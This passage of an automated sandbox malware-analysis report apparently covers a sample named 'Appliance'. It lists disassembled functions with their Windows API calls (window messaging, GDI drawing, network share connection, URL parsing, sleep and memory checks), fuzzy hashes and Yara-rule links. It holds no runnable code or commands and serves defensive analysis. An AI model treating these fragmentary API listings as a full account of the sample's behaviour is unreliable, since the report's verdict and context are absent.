Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 4e90ed9e87ae7869134f66fc351bf6e3ef45a5ef805e44606f53197749c35be4
Instruction ID: c6a69b4009fed526e78325c001e04922f82db3e9ab87350518d64152a5082433
Opcode Fuzzy Hash: 4e90ed9e87ae7869134f66fc351bf6e3ef45a5ef805e44606f53197749c35be4
Instruction Fuzzy Hash: A31190B9D00209AFDB01CFA9C884AEEBBB4FB08311F408166E915F2210D770AA55CF51

Function 00E236F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E23712
GetWindowThreadProcessId.USER32(?,00000000), ref: 00E23723
GetCurrentThreadId.KERNEL32 ref: 00E2372A
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E23731

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: a53cd6ec9a54625345ff89c4271c4780de1e3f83e74848a016ff3ff09790bf83
Instruction ID: ce14519ef7c49b0b9c0f35f56c32849781168a030042ae735b4dfb7a9cc0ef6e
Opcode Fuzzy Hash: a53cd6ec9a54625345ff89c4271c4780de1e3f83e74848a016ff3ff09790bf83
Instruction Fuzzy Hash: A7E039B11052247ADA3417A3AC4DEEB7E6CDB46BA2F000416B105E20809AA48945C6B1

Function 00E592BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00DC1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DC1F87
Part of subcall function 00DC1F2D: SelectObject.GDI32(?,00000000), ref: 00DC1F96
Part of subcall function 00DC1F2D: BeginPath.GDI32(?), ref: 00DC1FAD
Part of subcall function 00DC1F2D: SelectObject.GDI32(?,00000000), ref: 00DC1FD6

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00E592E3
LineTo.GDI32(?,?,?), ref: 00E592F0
EndPath.GDI32(?), ref: 00E59300
StrokePath.GDI32(?), ref: 00E5930E

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 602d1d60b6341403fd74f471ae24b5fbb0be84a3af4a95f33db335d80ccbcfec
Instruction ID: e5b9f00accb5158a0228f376ba77186fa8069356ccabdc1c71ec0a9eeef88dce
Opcode Fuzzy Hash: 602d1d60b6341403fd74f471ae24b5fbb0be84a3af4a95f33db335d80ccbcfec
Instruction Fuzzy Hash: 69F05E36009359FEDB225F55AC0EFCE3F5AAF0A326F048405FB11710E2C77555299BA5

Function 00DC21A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00DC21BC
SetTextColor.GDI32(?,?), ref: 00DC21C6
SetBkMode.GDI32(?,00000001), ref: 00DC21D9
GetStockObject.GDI32(00000005), ref: 00DC21E1

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 723b8aef6f6fd03633630a32d4e6662f75b302a07f33b5f40e321184f153a091
Instruction ID: 72cfcd104df2b1bf470443599248ca16e7f3cbecf4fc63b0e9cfd3ad7111deb1
Opcode Fuzzy Hash: 723b8aef6f6fd03633630a32d4e6662f75b302a07f33b5f40e321184f153a091
Instruction Fuzzy Hash: E3E06531244740AEDB315B75BC09BE83B11AB11336F048619F7F5A40E0C77246849B11

Function 00E1EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00E1EC36
GetDC.USER32(00000000), ref: 00E1EC40
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E1EC60
ReleaseDC.USER32(?), ref: 00E1EC81

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: c8de4b91fc8f90748427ad2fdf3ae475839a3576d94f2dedb6ec3436a9696f38
Instruction ID: a65cb3078c994b7b4a45f6b4e1080d561cde82edbe235d66d168b2485edcd936
Opcode Fuzzy Hash: c8de4b91fc8f90748427ad2fdf3ae475839a3576d94f2dedb6ec3436a9696f38
Instruction Fuzzy Hash: 6EE01AB0804304DFCB55AFA1CD48A5DBBB1EB08312F108809F84AF3350C7785946DF10

Function 00E1EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00E1EC4A
GetDC.USER32(00000000), ref: 00E1EC54
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E1EC60
ReleaseDC.USER32(?), ref: 00E1EC81

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 4ee2928e94509f7b1ae28c97156d913b17f8c3b3347862f547be02fd9cf0ec83
Instruction ID: e69205fac20f3c65b6aaad6f6eea55e6aa166169fe584ab31c668eed3e1cf316
Opcode Fuzzy Hash: 4ee2928e94509f7b1ae28c97156d913b17f8c3b3347862f547be02fd9cf0ec83
Instruction Fuzzy Hash: 6FE01AB0C04304DFCB65AFA1CD48A5DBBB1EB08312B108809E84AF3250C7786906DF10

Function 00E13616 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 409COMMON

Download Yara Rule

Strings

@COM_EVENTOBJ, xrefs: 00E13AD6
bn, xrefs: 00E13631, 00E138EA, 00E13903, 00E13B3F, 00E13B58

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: LoadString
String ID: @COM_EVENTOBJ$bn
API String ID: 2948472770-192135924
Opcode ID: 25800c3b778772529c3d9b2c5098c5c1c9e2130537ed1eb7765dde062f2e7f8e
Instruction ID: d7ad78cb98944662ffc095084ef2042486373dee30d9a5bcaa00ae3e5564c3b2
Opcode Fuzzy Hash: 25800c3b778772529c3d9b2c5098c5c1c9e2130537ed1eb7765dde062f2e7f8e
Instruction Fuzzy Hash: A6F1A0706083419FD724DF24C841BAAB7E0FF84718F14991DF58AAB2A1D771EE85CB92

Function 00E485DB Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00DE05B2: EnterCriticalSection.KERNEL32(00E9170C,?,00000000,?,00DCD22A,00E93570,00000001,00000000,?,?,00E3F023,?,?,00000000,00000001,?), ref: 00DE05BD
Part of subcall function 00DE05B2: LeaveCriticalSection.KERNEL32(00E9170C,?,00DCD22A,00E93570,00000001,00000000,?,?,00E3F023,?,?,00000000,00000001,?,00000001,00E92430), ref: 00DE05FA

Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333

Part of subcall function 00DE0413: __onexit.LIBCMT ref: 00DE0419

__Init_thread_footer.LIBCMT ref: 00E48658

Part of subcall function 00DE0568: EnterCriticalSection.KERNEL32(00E9170C,00000000,?,00DCD258,00E93570,00E027C9,00000001,00000000,?,?,00E3F023,?,?,00000000,00000001,?), ref: 00DE0572
Part of subcall function 00DE0568: LeaveCriticalSection.KERNEL32(00E9170C,?,00DCD258,00E93570,00E027C9,00000001,00000000,?,?,00E3F023,?,?,00000000,00000001,?,00000001), ref: 00DE05A5

Strings

Variable must be of type 'Object'., xrefs: 00E48697
bn, xrefs: 00E485E5, 00E4887F

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: Variable must be of type 'Object'.$bn
API String ID: 535116098-2837176596
Opcode ID: b0c6809ad80b5453b89d24a9f79979e2d53eccd10c073ff4048ebfaaf85b63b5
Instruction ID: f2ef5a14f535c1a79654b3c31336c669a40d4c401eaf1b3b3e4ab6cbfb621c83
Opcode Fuzzy Hash: b0c6809ad80b5453b89d24a9f79979e2d53eccd10c073ff4048ebfaaf85b63b5
Instruction Fuzzy Hash: 40917C74A00209EFCB04EF54E995DADBBB1FF48304F50905AF906BB292DB71AE45CB61

Function 00E357CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC41EA: _wcslen.LIBCMT ref: 00DC41EF

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00E35919

Strings

LPT, xrefs: 00E35840
*, xrefs: 00E35855

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 934d975353d3879ab4d4ec40707c72e7e34f20f16f7aece05c50a0fa33924b26
Instruction ID: a54706ce517e75f2373c9107d842bdc173107b4dedd8de0a679638937e5cc5b4
Opcode Fuzzy Hash: 934d975353d3879ab4d4ec40707c72e7e34f20f16f7aece05c50a0fa33924b26
Instruction Fuzzy Hash: FA918076A00604DFCB14DF54C498EA9BBF5EF44318F199099E84AAF352C771EE85CBA0

Function 00E25703 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 223comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00E258AF

Strings

0$, xrefs: 00E25952
Container, xrefs: 00E2581E

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ContainedObject
String ID: 0$$Container
API String ID: 3565006973-836522788
Opcode ID: db417e6d5abc861e8d3a0c4f9944c3d6b242081f50dfb1d206ba68873c0e2cf3
Instruction ID: 44214c95a3bbc4d23c50d5dd00c3b513012b81b3ddcb8c8b77765614ed65f645
Opcode Fuzzy Hash: db417e6d5abc861e8d3a0c4f9944c3d6b242081f50dfb1d206ba68873c0e2cf3
Instruction Fuzzy Hash: 6E815871200611EFDB14DF64C984A6ABBF4FF48714F10856EF94AEB291DBB0E841CB60

Function 00DEE5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00DEE67D

Strings

pow, xrefs: 00DEE655, 00DEE672

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 5c56994e9dbc0958f7fd433fe70ee3cbcb5f956fea8cbac524131c4dbf4b15f1
Instruction ID: 70817bb983fdbe0805b1db199be5035db97db2d740f3011084636f9edfe9502e
Opcode Fuzzy Hash: 5c56994e9dbc0958f7fd433fe70ee3cbcb5f956fea8cbac524131c4dbf4b15f1
Instruction Fuzzy Hash: 94517961E0824A8ACB117716DD013BB2BA0EB50740F29CE5CF1D5462E8EF358C85AA77

Function 00DDA8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 00DDA916

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 3de1400e7ca27508cec9c195a754f43d5d6efcfd269fcdb06f5bfb408c7c2ba8
Instruction ID: 6df38f83c661f0736904da2e6c092a5129b3fbb77e3dc0ccca3d90e1e692bd1d
Opcode Fuzzy Hash: 3de1400e7ca27508cec9c195a754f43d5d6efcfd269fcdb06f5bfb408c7c2ba8
Instruction Fuzzy Hash: 7E51ED359052479FCB25DF28C451AEA7BA4EF15314FA4805AF8A2AB290DF349D82CB71

Function 00DDF6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00DDF6DB
GlobalMemoryStatusEx.KERNEL32(?), ref: 00DDF6F4

Strings

@, xrefs: 00DDF6E8

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 636e361be9d18ff9c9b21abbfe377cd286349bee1abebc3025b1d8de56ea0f46
Instruction ID: 15d96b71e8b632048b18b07dd498c37f4fcbcbf3b376b9bfe085b82572ad5690
Opcode Fuzzy Hash: 636e361be9d18ff9c9b21abbfe377cd286349bee1abebc3025b1d8de56ea0f46
Instruction Fuzzy Hash: ED5138B14187499FD320AF51DC86FABB7E8FB84300F81885DF1D9921A1DB308569CB76

Function 00E3DB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00E3DB75
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00E3DB7F

Strings

|, xrefs: 00E3DB50

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 1a9f3f4db33bf8d140d43c090a567fbb0f8f0d9988ae95980a40ca2656f6f42b
Instruction ID: 4f13c12f3b03c3645e783a6a9814fac6e6241c855e6d5c886b2465594ae91bd6
Opcode Fuzzy Hash: 1a9f3f4db33bf8d140d43c090a567fbb0f8f0d9988ae95980a40ca2656f6f42b
Instruction Fuzzy Hash: 7B315C71801119ABCF16EFA1DC95EEEBFB9FF08304F101029F815B6162EB719A16DB60

Function 00E54008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00E540BD
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E540F8

Strings

static, xrefs: 00E54058

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 4d506e122fb425251e11b197e235c317b68e36230c5c7cb020b016a47b396950
Instruction ID: ec5a0b47168cfda3170a2460b09fdb6590a249029b72a02dec72ebaa46ff2305
Opcode Fuzzy Hash: 4d506e122fb425251e11b197e235c317b68e36230c5c7cb020b016a47b396950
Instruction Fuzzy Hash: 0A31A1B1100604AEDB24DF64CC40FFB73A8FF48729F109A19FA95A71D0CA70AC85DB61

Function 00E54FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00E550BD
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E550D2

Strings

', xrefs: 00E5502C

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: e01f1218de81d0429c3a5d52017f0f8f71b271382d8267aa7ebcb4bfb417534a
Instruction ID: 5ce4195cf1085f13e27a5477969b2dde60808b83849245c8daf1d070b054ebf6
Opcode Fuzzy Hash: e01f1218de81d0429c3a5d52017f0f8f71b271382d8267aa7ebcb4bfb417534a
Instruction Fuzzy Hash: E7315775A0070A9FDB04CFA9C890BEA7BB5FF49304F20146AED04AB381D371A949CF90

Function 00DC20B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0

Part of subcall function 00DC2234: GetWindowLongW.USER32(?,000000EB), ref: 00DC2242

GetParent.USER32(?), ref: 00E03440
DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 00E034CA

Strings

(, xrefs: 00DC20B9

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: LongWindow$ParentProc
String ID: (
API String ID: 2181805148-2063206799
Opcode ID: fd350299779c09d6e1add79cbc177d0399e7b966f0332b25071cffd964fc8031
Instruction ID: 27bbc0069664f346f92550bf45cd21cf6b39d401c61a3aa38c5360253001457d
Opcode Fuzzy Hash: fd350299779c09d6e1add79cbc177d0399e7b966f0332b25071cffd964fc8031
Instruction Fuzzy Hash: 7F21A830601245AFCF269F78CC49EB93B6AEF45364F180249F6256B2F2C3319E55D720

Function 00E541AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00DC7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DC78B1
Part of subcall function 00DC7873: GetStockObject.GDI32(00000011), ref: 00DC78C5
Part of subcall function 00DC7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DC78CF

GetWindowRect.USER32(00000000,?), ref: 00E54216
GetSysColor.USER32(00000012), ref: 00E54230

Strings

static, xrefs: 00E541F3

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: d4c91ef109139bf73ab3efbed0bd4ad94d7c42662c5aa9018404e7bac7bd392f
Instruction ID: 92cde218b163ac36bf952ce93838524b1c068ae82e2f95910dedff9a8493593a
